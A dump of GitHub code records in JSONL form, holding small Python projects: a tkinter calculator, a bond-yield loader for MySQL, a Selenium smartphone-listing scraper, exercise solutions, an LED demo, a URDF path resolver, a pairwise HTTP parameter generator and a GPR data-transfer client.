input.set(mistake)\n \ndef clear():\n error = input.get()\n input.set(\"\")\n\ndef text_insert(text):\n current = input.get()\n input.set(current + str(text))\n \ndef evaluate():\n eqn = input.get()\n try:\n result = str(eval(eqn))\n time.sleep(0.3)\n input.set(result)\n except SyntaxError:\n time.sleep(1.0)\n input.set(\"SyntaxERROR\")\n\ncal = tk.Tk()\ncal.title(\"Calculator\")\ncal.geometry(\"400x400\")\ncal.resizable(False, False)\n\ninput = StringVar()\n\ntitle = tk.Label(cal, text=\"Calculator\", font=(\"Times New Roman\", 10, \"bold\"), background=\"black\", fg=\"white\")\ntitle.place(x=150)\n\ndisplay = tk.Entry(cal, bd=5, textvariable= input, justify=RIGHT, width=20, font=(\"Times New Roman\", 10)).place(x=30, y=50)\n\nseven = tk.Button(cal, text=\"7\", command = lambda:text_insert(7), bd=2, bg=\"gray\").place(y=120)\n\neight = tk.Button(cal, text=\"8\", command = lambda:text_insert(8), bd=2, bg=\"gray\").place(x=100, y=120)\n\nnine = tk.Button(cal, text=\"9\", command = lambda:text_insert(9), bd=2, bg=\"gray\").place(x=200, y=120)\n\ndelete = tk.Button(cal, text=\"Del\", command=delete, width=1, height=1, bd=2, bg=\"yellow\", fg=\"red\", activebackground=\"red\", activeforeground=\"yellow\").place(x=300, y=120)\n\nac = tk.Button(cal, text=\"AC\", command=clear, width=1, height=1, bd=2, bg=\"yellow\", fg=\"red\", activebackground=\"red\", activeforeground=\"yellow\").place(x=400, y=120)\n\nfour = tk.Button(cal, text=\"4\", command = lambda:text_insert(4), bg=\"gray\", bd=2).place(y=200)\n\nfive = tk.Button(cal, text=\"5\", command = lambda:text_insert(5), bg=\"gray\", bd=2).place(x=100, y=200)\n\nsix = tk.Button(cal, text=\"6\", command = lambda:text_insert(6), bg=\"gray\", bd=2).place(x=200, y=200)\n\nmul = tk.Button(cal, text=\"×\", command = lambda:text_insert(\"*\"), bg=\"lightgreen\", bd=2).place(x=300, y=200)\n\ndiv = tk.Button(cal, text=\"÷\", command = 
lambda:text_insert(\"/\"), bg=\"lightgreen\", bd=2).place(x=400, y=200)\n\none = tk.Button(cal, text=\"1\", command = lambda:text_insert(1), bg=\"gray\", bd=2).place(y=280)\n\ntwo = tk.Button(cal, text=\"2\", command = lambda:text_insert(2), bg=\"gray\", bd=2).place(x=100, y=280)\n\nthree = tk.Button(cal, text=\"3\", command = lambda:text_insert(3), bg=\"gray\", bd=2).place(x=200, y=280)\n\nplus = tk.Button(cal, text=\"+\", command= lambda:text_insert(\"+\"), bg=\"lightgreen\", bd=2).place(x=300, y=280)\n\nminus = tk.Button(cal, text=\"-\", command = lambda:text_insert(\"-\"), width=1, height=1, bg=\"lightgreen\", bd=2).place(x=400, y=280)\n\nzero = tk.Button(cal, text=\"0\", command = lambda:text_insert(0), bg=\"gray\", bd=2).place(y=360)\n\ndot = tk.Button(cal, text=\".\", command = lambda:text_insert(\".\"), bg=\"gray\", bd=2).place(x=100, y=360)\n\nequalTo = tk.Button(cal, text=\"=\", command = evaluate, bg=\"yellow\", fg=\"red\", activebackground=\"blue\", activeforeground=\"white\", bd=2).place(x=200, y=360)\n\nopenBrac = tk.Button(cal, text=\"(\", command = lambda:text_insert(\"(\"), bg=\"lightgreen\", bd=2).place(x=300, y=360)\n\ncloseBrac = tk.Button(cal, text=\")\", command = lambda:text_insert(\")\"), bg=\"lightgreen\", bd=2).place(x=400, y=360)\n\nexit = tk.Button(cal, text=\"EXIT\", fg=\"white\", command=quit, bg=\"red\", bd=2).place(x=350, y=440) \n\ncal.configure(background = \"black\")\ncal.maxsize(400,400)\ncal.minsize(400,400)\ncal.mainloop()","repo_name":"D-MythX/GUI_Cal","sub_path":"CalTk.py","file_name":"CalTk.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"68"} +{"seq_id":"19098011912","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport os\nimport logging\nfrom typing import List\nfrom datetime import datetime, timedelta\n\nimport requests\nimport mysql.connector\nimport pandas as pd\n\nsys.path.append(os.getcwd())\n\nfrom conf import db_conf\n\nlxr_token = os.getenv(\"LXR_TOKEN\")\nnational_debt_table = \"national_debt\"\n\nclass Macro:\n \"\"\"用于获取宏观数据\n \"\"\"\n def __init__(self) -> None:\n self.conn = None\n\n \n def get_conn(self):\n if not self.conn:\n self.conn = mysql.connector.connect(\n host=db_conf.DB_HOST,\n port=db_conf.DB_PORT,\n user=db_conf.DB_USER,\n password=db_conf.DB_PASSWORD,\n database=\"finance_data\"\n )\n return self.conn\n\n\n def close_coon(self):\n if self.conn is not None:\n self.conn.close()\n return\n\n\n def init_national_debt_table(self):\n conn = self.get_conn()\n create_sql = \"\"\"\n CREATE TABLE IF NOT EXISTS `{}` (\n `id` INT AUTO_INCREMENT,\n `areaCode` VARCHAR(255),\n `date` VARCHAR(255),\n `tcm_m1` DOUBLE,\n `tcm_m3` DOUBLE,\n `tcm_m6` DOUBLE,\n `tcm_y1` DOUBLE,\n `tcm_y2` DOUBLE,\n `tcm_y3` DOUBLE,\n `tcm_y5` DOUBLE,\n `tcm_y7` DOUBLE,\n `tcm_y10` DOUBLE,\n `tcm_y20` DOUBLE,\n `tcm_y30` DOUBLE,\n PRIMARY KEY (`id`),\n UNIQUE KEY (`areaCode`, `date`)\n )ENGINE=InnoDB DEFAULT CHARSET=utf8;\n \"\"\".format(national_debt_table)\n cursor = conn.cursor()\n cursor.execute(create_sql)\n cursor.close()\n return\n\n\n def get_national_debt_data(self, area_code: str, start, end):\n start = datetime.strftime(start, \"%Y-%m-%d\")\n end = datetime.strftime(end, \"%Y-%m-%d\")\n url = \"https://open.lixinger.com/api/macro/national-debt\"\n params = {\n \"token\": lxr_token,\n \"areaCode\": area_code,\n \"startDate\": start,\n \"endDate\": end,\n \"metricsList\": [\n \"tcm_m1\",\n \"tcm_m3\",\n \"tcm_m6\",\n \"tcm_y1\",\n \"tcm_y2\",\n \"tcm_y3\",\n 
\"tcm_y5\",\n \"tcm_y7\",\n \"tcm_y10\",\n \"tcm_y20\",\n \"tcm_y30\"\n ]\n }\n r = requests.post(url, json=params)\n res = r.json()\n data = res[\"data\"]\n return data\n\n\n def insert_national_debt(self, data: List[dict]):\n insert_sql = \"\"\"\n insert into `{}` (\n areaCode,\n date,\n tcm_m1,\n tcm_m3,\n tcm_m6,\n tcm_y1,\n tcm_y2,\n tcm_y3,\n tcm_y5,\n tcm_y7,\n tcm_y10,\n tcm_y20,\n tcm_y30) \n values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s) \n ON DUPLICATE KEY UPDATE\n tcm_m1 = VALUES(tcm_m1),\n tcm_m3 = VALUES(tcm_m3),\n tcm_m6 = VALUES(tcm_m6),\n tcm_y1 = VALUES(tcm_y1),\n tcm_y2 = VALUES(tcm_y2),\n tcm_y3 = VALUES(tcm_y3),\n tcm_y5 = VALUES(tcm_y5),\n tcm_y7 = VALUES(tcm_y7),\n tcm_y10 = VALUES(tcm_y10),\n tcm_y20 = VALUES(tcm_y20),\n tcm_y30 = VALUES(tcm_y30)\n ; \n \"\"\".format(national_debt_table)\n conn = self.get_conn()\n cursor = conn.cursor()\n index_list = []\n for item in data:\n areaCode = item[\"areaCode\"]\n item[\"date\"] = item[\"date\"].split(\"T\")[0]\n index_list.append([\n areaCode,\n item[\"date\"],\n item.get(\"tcm_m1\", 0),\n item.get(\"tcm_m3\", 0),\n item.get(\"tcm_m6\", 0),\n item.get(\"tcm_y1\", 0),\n item.get(\"tcm_y2\", 0),\n item.get(\"tcm_y3\", 0),\n item.get(\"tcm_y5\", 0),\n item.get(\"tcm_y7\", 0),\n item.get(\"tcm_y10\", 0),\n item.get(\"tcm_y20\", 0),\n item.get(\"tcm_y30\", 0),\n ])\n try:\n cursor.executemany(insert_sql, index_list)\n conn.commit()\n except Exception as e:\n conn.rollback()\n logging.warning(\"insert national debt err:%s \", e)\n cursor.close()\n return\n\n\n def get_latest_update_date(self, table: str):\n sql = \"select `date` from `{}` order by `date` desc limit 1\".format(table)\n print(sql)\n cursor = self.get_conn().cursor()\n cursor.execute(sql)\n res = cursor.fetchone()\n if res:\n start = res[0]\n start = datetime.strptime(start, \"%Y-%m-%d\") + timedelta(days=1)\n return start\n return datetime.strptime(\"1990-01-01\", \"%Y-%m-%d\")\n\n\n def load_national_debt_data(self, area_code: str, rows: list):\n sql = \"select {} from '{}' where areaCode='{}'\".format(\",\".join(rows), national_debt_table, area_code)\n df = pd.read_sql(sql, self.get_conn())\n return df\n\n \n def insert_or_update_national_debt(self):\n self.init_national_debt_table()\n start = self.get_latest_update_date(national_debt_table)\n end = datetime.today()\n # 暂时只获取中债数据\n area_code = \"cn\"\n while start <= end:\n next_start = start + timedelta(days=3650)\n national_debt_data = self.get_national_debt_data(area_code, start, next_start)\n self.insert_national_debt(national_debt_data)\n start = next_start + timedelta(days=1)\n return\n\nif __name__ == \"__main__\":\n macro = Macro()\n macro.insert_or_update_national_debt()\n macro.close_coon()","repo_name":"AFreeCoder/quant-toolbox","sub_path":"scripts/dump_macro_data.py","file_name":"dump_macro_data.py","file_ext":"py","file_size_in_byte":5920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"71721095257","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport pandas as pd\nfrom selenium.webdriver.firefox.options import Options\nfrom progress.bar import IncrementalBar\n\nfrom common import save\n\no = Options()\n\no.page_load_strategy = 'eager'\n\ndriver = webdriver.Firefox(options=o)\n\ndef get_page(page_num):\n driver.get(f'https://www.dns-shop.ru/catalog/17a8a01d16404e77/smartfony/?stock=now-today-tomorrow-later-out_of_stock&f[pqc]=68kur-kdf7y-o8r3o-y6ccf-1ccyzc&p={page_num}')\n\ndef 
find_urls():\n    return [i.get_attribute('href') + 'characteristics/' \\\n            for i in driver. \\\n            find_elements(By.CSS_SELECTOR, '.catalog-product__name.ui-link')]\n\np_num = 1\n\nget_page(p_num)\n\ntemp_link_elements = find_urls()\nurls = []\n\nwhile len(temp_link_elements) > 0:\n    urls += temp_link_elements\n\n    print(f'Page {p_num}')\n    print(*temp_link_elements, sep='\\n', end='\\n\\n')\n\n    p_num += 1\n    get_page(p_num)\n    # scrape the newly loaded page (scraping before navigating re-read the old page and duplicated its links)\n    temp_link_elements = find_urls()\n\ni = 1\n\ndef load_info(page_url):\n    info = {}\n    price = []  # default so the lookup below does not raise NameError when the request fails\n    try:\n        driver.get(page_url)\n\n        info_elements = driver.find_elements(By.CLASS_NAME, 'product-characteristics__spec')\n\n        for el in info_elements:\n            key = el.find_element(By.CLASS_NAME, 'product-characteristics__spec-title').text\n            value = el.find_element(By.CLASS_NAME, 'product-characteristics__spec-value').text\n\n            info[key] = value\n        \n        price = driver.find_elements(By.CLASS_NAME, 'product-buy__price')\n    except Exception as e:\n        pass\n\n    price = price[0].text if price else None\n\n    info['price'] = price\n    info['url'] = page_url\n\n    # print(info, end='\\n\\n')\n\n    return info\n\ninfos = []\n\nbar = IncrementalBar('Parsing', max = len(urls))\n\ni = 1\nfor url in urls:\n    infos.append(load_info(url))\n    \n    bar.next()\n\n    i+=1\n    if i % 100 == 0:\n        save(infos, 'smartphones.csv')\n\ndriver.close()\ndriver.quit()\n\nsave(infos, 'smartphones.csv')","repo_name":"d-mour/KnowledgeGrpahCourse","sub_path":"Practice/2022/P41301/Parakhin_Chernousov_Smartphones/src/parse_smartphones.py","file_name":"parse_smartphones.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"}
+{"seq_id":"40704021849","text":"# -*- coding: utf-8 -*-\n\n'''\nAuthor: Postprandial\nPurpose: Version 2 of the Bob file:\nBob now answers all questions with 'Sure' and all shouting (caps) with 'Whoa, chill out!'\nLowercase questions or questions ending in whitespace are also answered with 'Sure'.\nBob also still looks \nAll statements (upper & lowercase) are answered. \n'''\n\ndef hey(what):\n\t\n\tprompt=what.strip()\n\tanswer=''\n\t\n\tanswerFine=[' \\t',\"\"]\n\n\tif prompt in answerFine:\n\t\tanswer='Fine. 
Be that way!'\n\telif prompt.isupper():\n\t\tanswer='Whoa, chill out!'\n\telif prompt[-1]=='?':\n\t\tanswer='Sure.'\n\telse:\n\t\tanswer='Whatever.'\n\t\t\n\treturn answer\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/bob/e521d476743c42ac9b3d37225576e9b9.py","file_name":"e521d476743c42ac9b3d37225576e9b9.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"}
+{"seq_id":"20295425009","text":"from machine import LED\r\nimport utime as time\r\n\r\nRGB = LED(LED.RGB) # Use the WS2812B (RGB LED) driver specific to the Lite board \r\n\r\n# Single-LED control; RGB = 0 leaves the LED off\r\nRGB.rgb_write( 1 , 255 ,0 ,0) # Set the 1st RGB LED, R=255 /G=0 /B=0\r\nRGB.rgb_write( 2 , 0 ,255 ,0) # Set the 2nd RGB LED, R=0 /G=255 /B=0\r\nRGB.rgb_write( 3 , 0 ,0 ,255) # Set the 3rd RGB LED, R=0 /G=0 /B=255\r\n\r\ntime.sleep(1)\r\n# Control several RGB LEDs at once (using a list)\r\n\r\nColor = [ [0,100,0] , [255,100 ,0] , [100 ,10 ,100] ] # Set the RGB colors of the first three RGB LEDs\r\nRGB.rgb_write( Color)\r\ntime.sleep(1)\r\n\r\n# Brightness (1-100) can be set before rgb_write\r\nRGB.lightness(100)\r\nRGB.rgb_write( Color)\r\n\r\n# Use a loop to fade the RGB LEDs gradually brighter\r\nfor lightness in range(1,100,10): \r\n    RGB.lightness(lightness)\r\n    RGB.rgb_write( Color)\r\n    time.sleep_ms(500)\r\n","repo_name":"richlink-tech/ePy-Lite","sub_path":"SampleCode/ExBoard_sampleCode/RGBLED_simple.py","file_name":"RGBLED_simple.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"}
+{"seq_id":"22546761259","text":"\"\"\"This script processes a ros urdf file so that all paths specified\nusing ros package:// syntax are resolved properly, allowing one to use\nthe urdf file with pybullet directly.\n\nUsage\n    python resolve_package_path_urdf.py [filename]\n\n\"\"\"\nimport sys\nimport rospkg\nimport re\n\nrospack = rospkg.RosPack()\nfilename = sys.argv[1]\nmatch = re.match(r'([a-zA-Z_]*).urdf', filename, re.M)\nif match is None:\n    print(\"given file {:} is not an urdf file\".format(filename))\nfilename1 = match.group(1)\n\nwith open(filename, 'r') as f:\n    doc = f.read()\n\n\nwhile True:\n    # match package://[package_name]/\n    match = re.search(r'package://([A-Za-z_]*)', doc, re.M)\n    if match is None:\n        break\n    package_name = match.group(1)\n    print(\"Found package: {:}\".format(package_name))\n    package_path = rospack.get_path(package_name)\n    doc = doc.replace(match.group(), package_path)\n\nfilename_new = \"{:}_res.urdf\".format(filename1)\nwith open(filename_new, 'w') as f:\n    f.write(doc)\n    print(\"Wrote a new urdf file at: {:}\".format(filename_new))\n","repo_name":"SimbaXu/infinite_interaction","sub_path":"data/urdf/resolve_package_path_urdf.py","file_name":"resolve_package_path_urdf.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"15403953223","text":"\"\"\"\r\n14. Write a Python program to input a player's name (string) and runs (int) scored for n\r\nnumber of players, where n should be an input from the keyboard. Store the players’\r\ndetails in a dictionary called 'cricket'. 
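(Illustrative example, not part of the original assignment: with stored scores {'Virat': 82, 'Rohit': 45}, entering 'Virat' prints 82 and an unknown name prints -1.) 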
After preparing the dictionary, input a player's name\r\nand print the runs scored by him, otherwise print '-1' if the player name is not found.\r\n\"\"\"\r\nn=int(input(\"HOW MANY PLAYERS YOU CAN CHOOSE:\"))\r\nlist_name=[]\r\nlist_score=[]\r\nfor i in range(n):\r\n    ele=input(\"ENTER THE PLAYER NAMES: \")\r\n    list_name.append(ele)\r\nprint(list_name)\r\nfor i in range(n):\r\n    ele2=int(input(\"ENTER THE SCORES: \"))\r\n    list_score.append(ele2)\r\nprint(list_score)\r\nplayer_list=dict(zip(list_name,list_score))\r\nprint(player_list)\r\nnum=input(\"ENTER A PLAYER NAME: \")\r\nif num in player_list:\r\n    print(player_list[num])\r\nelse:\r\n    print(\"-1\")\r\n\r\n\r\n# player=input(\"ENTER THE PLAYER NAME:\")\r\n# if player in class_list:\r\n#     print(class_list[player])\r\n# else:\r\n#     print(\"-1\")\r\n    # class_list[temp[0]] = int(temp[1])\r\n\r\n\r\n# # Displaying the dictionary\r\n# for key, value in class_list.items():\r\n# \tprint('Name: {}, Score: {}'.format(key, value))\r\n\r\n# lis_name=[\"MOHIBUL\",\"KOULIK\",\"BIKI\",\"SARTHAK\",\"ASIS\",\"KUNDAN\"]\r\n# lis_salary=[20,25,30,35,40,45]\r\n# Emp_lis=dict(zip(lis_name,lis_salary))\r\n# print(Emp_lis)","repo_name":"mohibul2000/MY_PROJECTS","sub_path":"assignments.py/Q14.py","file_name":"Q14.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"4665005163","text":"import sys\nsys.path.append(\"../..\")\nfrom testcase_automaker.Utils.amazingutils import randoms\nfrom allpairspy import AllPairs\nimport random\nimport copy\n\n\nclass http_params_generator(object):\n    '''\n\n\n    >>> params_generator = http_params_generator(parameters_structure={'name': {'type': 'string', 'value': '','range':['张三','李四'], 'iscompulsory': True},\\\n    'phone': {'type': 'number', 'value': '', 'iscompulsory': True},\\\n    'claimant': {'type': 'object', 'value': {'name': {'type': 'string', 'value': '', 'iscompulsory': True}\\\n    ,'phone': {'type': 'number', 'value': '', 'iscompulsory': True}}, 'iscompulsory': True},\\\n    'informations': {'type': 'array', 'value': [{'claimant': {'type': 'object', 'value': {'name': {'type': 'string', 'value': '', 'iscompulsory': True}\\\n    ,'phone': {'type': 'number', 'value': '', 'iscompulsory': True}}, 'iscompulsory': True}},\\\n    {'name': {'type': 'string', 'value': '', 'iscompulsory': True}}], 'iscompulsory': True}})\n\n    >>> params_generator.get_params_num()\n    7\n    >>> params_generator.generate_params_list()\n    >>> type(params_generator.generated_params_list)\n    <class 'list'>\n    >>> type(random.choice(params_generator.generated_params_list))\n    <class 'dict'>\n    >>> len(params_generator.generated_params_list)\n    7\n\n    >>> params_generator = http_params_generator(parameters_structure={})\n    >>> params_generator.get_params_num()\n    0\n    >>> params_generator.generate_params_list()\n    >>> type(params_generator.generated_params_list)\n    <class 'list'>\n    >>> len(params_generator.generated_params_list)\n    0\n\n    '''\n    def __init__(self, parameters_structure, generated_params_list=None):\n        self.parameters_structure = parameters_structure\n        self.generated_params_list = generated_params_list\n\n    # Generate the list of parameter combinations\n    def generate_params_list(self):\n        parameters = http_params_generator.get_pairwise_list(self.get_params_num())\n        params_usage_2d_list = []\n        params_combo_list = []\n        if len(parameters) > 1:\n            for pairs in AllPairs(parameters):\n                params_usage_2d_list.append(pairs)\n            for params_usage_list in params_usage_2d_list:\n                yield_params_usage_list = http_params_generator.yield_list(params_usage_list)\n                raw_params_list = 
self.generate_params(parameters_usage_list=yield_params_usage_list)\n                prepared_params_list = http_params_generator.get_value_dic(raw_params_list)\n                params_combo_list.append(prepared_params_list)\n        elif len(parameters) == 1:  # the third-party AllPairs library does not support a single parameter\n            yield_params_usage_list_true = http_params_generator.yield_list([True])\n            yield_params_usage_list_false = http_params_generator.yield_list([False])\n            raw_params_list_true = self.generate_params(parameters_usage_list=yield_params_usage_list_true)\n            prepared_params_list_true = http_params_generator.get_value_dic(raw_params_list_true)\n            raw_params_list_false = self.generate_params(parameters_usage_list=yield_params_usage_list_false)\n            prepared_params_list_false = http_params_generator.get_value_dic(raw_params_list_false)\n            params_combo_list.append(prepared_params_list_true)\n            params_combo_list.append(prepared_params_list_false)\n        self.generated_params_list = params_combo_list\n\n    # Generate parameter values\n    def generate_params(self, parameters_usage_list, parameters_structure=None):\n        if parameters_structure is None:\n            parameters_structure = copy.deepcopy(self.parameters_structure)\n        for key, attribute in parameters_structure.items():\n            type_name = attribute['type']\n            if type_name.lower() == 'object':\n                self.generate_params(parameters_structure=attribute['value'],\n                                     parameters_usage_list=parameters_usage_list)\n                continue\n            if type_name.lower() == 'array':\n                for value in attribute['value']:\n                    self.generate_params(parameters_structure=value,\n                                         parameters_usage_list=parameters_usage_list)\n                continue\n            type_category = self.get_type_category(key)\n            if 'range' in attribute and attribute['range']:\n                generated_value = random.choice(attribute['range'])\n            else:\n                generated_value = self.get_parameter_random_value(type_name, type_category)\n\n            if next(parameters_usage_list) or ('range' in attribute and attribute['range']):\n                parameters_structure[key]['value'] = generated_value\n            else:\n                parameters_structure[key]['value'] = None\n        return parameters_structure\n\n    def get_params_num(self, parameters_structure=None, num=0):\n        if parameters_structure is None:\n            parameters_structure = copy.deepcopy(self.parameters_structure)\n        for key, attribute in parameters_structure.items():\n            type_name = attribute['type']\n            if type_name.lower() == 'object':\n                num += self.get_params_num(attribute['value'])\n                continue\n            if type_name.lower() == 'array':\n                for value in attribute['value']:\n                    num += self.get_params_num(value)\n                continue\n            else:\n                num += 1\n        return num\n\n    # Compare whether two dicts are partially equal (stub, not yet implemented)\n    @staticmethod\n    def remove_duplicated_dict_in_list(dic_list):\n        for dic in dic_list:\n            pass\n\n    @staticmethod\n    def yield_list(input_list):\n        for i in input_list:\n            yield i\n\n    @staticmethod\n    def get_pairwise_list(params_num):\n        parameters = []\n        for i in range(params_num):\n            parameters.append([True, False])\n        return parameters\n\n    # Return a dict that keeps only the 'value' field of each attribute as the value of the current key\n    @staticmethod\n    def get_value_dic(dic):\n        new_dic = dict()\n        for key, attribute in dic.items():\n            if attribute['type'].lower() == 'object':\n                new_dic[key] = http_params_generator.get_value_dic(attribute['value'])\n                continue\n            if attribute['type'].lower() == 'array':\n                new_dic[key] = []\n                for value in attribute['value']:\n                    new_dic[key].append(http_params_generator.get_value_dic(value))\n                continue\n            new_dic[key] = attribute['value']\n        return new_dic\n\n    # Derive the data category from the key name\n    @staticmethod\n    def get_type_category(key):\n        if key == 'phone':\n            return 'chinese_mobile_phone'\n        if key == 'name':\n            return 'chinese_name'\n        else:\n            return 'default'\n\n    # Generate a random value based on the data type and its category
\n    @staticmethod\n    def get_parameter_random_value(type_name, type_category='default'):\n        if type_name.lower() == 'boolean':\n            return randoms.get_random_boolean()\n        if type_name.lower() == 'number':\n            return randoms.get_random_num(num_type=type_category)\n        if type_name.lower() == 'string':\n            return randoms.get_random_str(str_type=type_category)\n        if type_name.lower() == 'date':\n            return randoms.get_random_num(length=9)\n        else:\n            return None\n\n\nif __name__ == '__main__':\n    import doctest\n    doctest.testmod()\n","repo_name":"amazingTest/testcase-automaker","sub_path":"testcase_automaker/interface/http_params_generator.py","file_name":"http_params_generator.py","file_ext":"py","file_size_in_byte":7920,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"68"}
+{"seq_id":"2323769092","text":"import socket\nimport transfer_tools as tls\nimport time\nfrom datetime import datetime\nimport cv2\nimport os\nfrom tcp_latency import measure_latency\n\n# Read the config file first\nsource_config = \"/home/stanch/configs/source_config.txt\"\nhotspot_config = \"/home/stanch/configs/orbic_config.txt\"\nlog_file = \"/home/stanch/DataTransferMaster/suspects.log\"\n\ndef latency_check(loc_config: str) -> list:\n    Host, Port, _, _ = tls.configReader(loc_config)\n    latency_list = measure_latency(Host,Port)\n    return latency_list\n\n\ndef clientHandler(mode: str):\n    Host, Port, _, search_path = tls.configReader(source_config)\n    print(\"Waiting for Connection to Host\")\n\n    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n\n        s.connect((Host, Port))\n        print(\"Connected to \", Host)\n\n        # Prompt the user for the name of the survey and send it off\n        #print(\"Sending Directory...\")\n        #directory = \"DIR \" + input(\"Enter Survey Directory: \")\n        #tls.gen_send(s,directory)\n        #ACK_response = tls.gen_recv(s)\n\n        # Or, if we're in testing mode, use this for the directory\n        date_and_time = datetime.now().strftime(\"%m-%d_%H-%M\")\n        directory = \"Perks_\" + date_and_time\n        print(directory)\n        tls.gen_send(s,\"DIR \"+directory)\n        ACK_response = tls.gen_recv(s)\n\n        # Currently the client is always running, looking for new files\n        # to be added to the survey. When a real survey is complete the\n        # client must be manually stopped. 
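\n        # Per-iteration protocol, summarised from the code below (comment added\n        # for readability): send the local DZT file stack, receive the server's\n        # request stack, then for each requested file send the payload, wait for\n        # an ACK, receive the rendered b-scan image, ACK it back, and log the\n        # timing metrics to the report file.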
\n\n while True:\n \n try:\n # Send the list of files on the source machine, need to recive the list of files on the server\n # In practice this should be todays_stack but since the \n # data set were working with is not \"live\" so to speak\n # We want the full stack\n\n print(\"Sending Source Stack...\")\n source_stack = tls.full_stack(search_path,\"DZT\")\n tls.gen_send(s,source_stack)\n request_stack = tls.gen_recv(s)\n\n if request_stack != []:\n print(\"Sending Files...\")\n # Create the associated report file\n with open(\"/home/stanch/public/reports/\"+directory+\"_Report.txt\", 'a+') as f:\n line = \"File,Mode,Size (Kb),T_p (nS),T_s (nS),T_t (ns),Rate (Mbit/s) \\n\"\n f.write(line)\n\n while request_stack != []:\n next_file = request_stack.pop()\n print(\"Sending \",next_file)\n next_dzt = tls.DZT_DAT(next_file)\n start_send_timer = time.monotonic_ns()\n tls.gen_send(s,next_dzt)\n ACK_response = tls.gen_recv(s)\n end_send_timer = time.monotonic_ns()\n b_scan = tls.gen_recv(s)\n end_total_timer = time.monotonic_ns()\n tls.gen_send(s, \"ACK\")\n \n # Get/Calucalte Metrics and write them to the report file\n name = next_file.split('.')[0] # File Name\n size = (len(next_dzt.dzt_contents)+len(next_dzt.realsense_contents))/1000 # File sizes in Kilobytes\n processing_time = tls.gen_recv(s) # Time to process in Ns\n sending_time = end_send_timer - start_send_timer # Time to send in Ns\n total_time = end_total_timer - start_send_timer # Total delay time in Ns\n sending_rate = (size*8)/(sending_time*(10**-9)*(10**3)) # Rate in Megabits/s\n with open(\"/home/stanch/public/reports/\"+directory+\"_Report.txt\", 'a+') as f:\n line = name + \",\" + mode + \",\" + str(size) + \",\" + str(processing_time) + \",\" + str(sending_time) + \",\" +str(total_time) + \",\" + str(sending_rate) + \"\\n\"\n f.write(line)\n\n\n print(\"/home/stanch/public/b_scans/\"+next_file.split('.')[0]+\".png\")\n cv2.imwrite(\"/home/stanch/public/b_scans/\"+next_file.split('.')[0]+\".png\", b_scan)\n\n print(\"Stack Empty\")\n \n # switch the commented lines in this block during real\n # opperation vs experimental setups\n else:\n # print(\"No requests, waiting for more files....\")\n # time.sleep(delay)\n break\n \n except KeyboardInterrupt:\n break\n \n # Close the socket\n print(\"Closing Connection...\")\n tls.gen_send(s,\"COM exit\")\n ACK_response = tls.gen_recv(s)\n\n return\n\ndef main():\n\n # check the current mode and run in that mode\n set_mode = \"4G\"\n print(\"Setting mode to\",set_mode)\n tls.set_mode(hotspot_config,set_mode)\n\n print(\"Checking network mode...\")\n mode = tls.check_mode(hotspot_config)\n if set_mode != mode:\n print(\"WARNING Current mode:\",mode,\"does not match the set mode\",set_mode)\n clientHandler(set_mode)\n\n # check the mode again at the end of the event, if the mode has changed flag the run as suspect\n post_mode = tls.check_mode(hotspot_config)\n if set_mode != post_mode:\n print(\"Mode does not match pre-execution value\")\n date_and_time = datetime.now().strftime(\"%m-%d_%H-%M\")\n with open(log_file, \"w+\") as f:\n f.writelines(\"run at\" + date_and_time + \"suspect, mode switched during execution\")\n \n while True:\n try:\n \n # Switch modes\n if set_mode == \"5G\":\n print(\"Switching to 4G\")\n tls.set_mode(hotspot_config,\"4G\")\n set_mode = \"4G\"\n elif set_mode == \"4G\":\n print(\"Switching to 5G\") \n tls.set_mode(hotspot_config,\"5G\")\n set_mode = \"5G\"\n else:\n raise Exception('Unknown Mode',set_mode)\n \n # Find the correct time to the next event at the 
quarter hour\n            # create a time object\n            now = datetime.now()\n            # find the number of seconds to the next quarter hour\n            sec_to_wait = (15 - (now.minute % 15))*60\n            print(\"Waiting for next event....(\" + str(sec_to_wait/60)+ \" minutes)\")\n            time.sleep(sec_to_wait)\n\n            # Call the actual handler\n            print(\"checking current mode...\")\n            pre_mode = tls.check_mode(hotspot_config)\n            if set_mode != pre_mode:\n                print(\"WARNING Current mode:\",mode,\"does not match the set mode\",set_mode)\n            clientHandler(set_mode)\n            print(\"confirming constant mode...\")\n            post_mode = tls.check_mode(hotspot_config)\n            if pre_mode != post_mode or pre_mode != set_mode:\n                date_and_time = datetime.now().strftime(\"%m-%d_%H-%M\")\n                with open(log_file, \"w+\") as f:\n                    f.write(\"run at \" + date_and_time + \" suspect, mode switched during execution\")\n\n        except KeyboardInterrupt:\n            break\n\n    return\n\n\nif __name__ == \"__main__\":\n    main()","repo_name":"scotttanch/DataTransferMaster","sub_path":"Source.py","file_name":"Source.py","file_ext":"py","file_size_in_byte":7441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
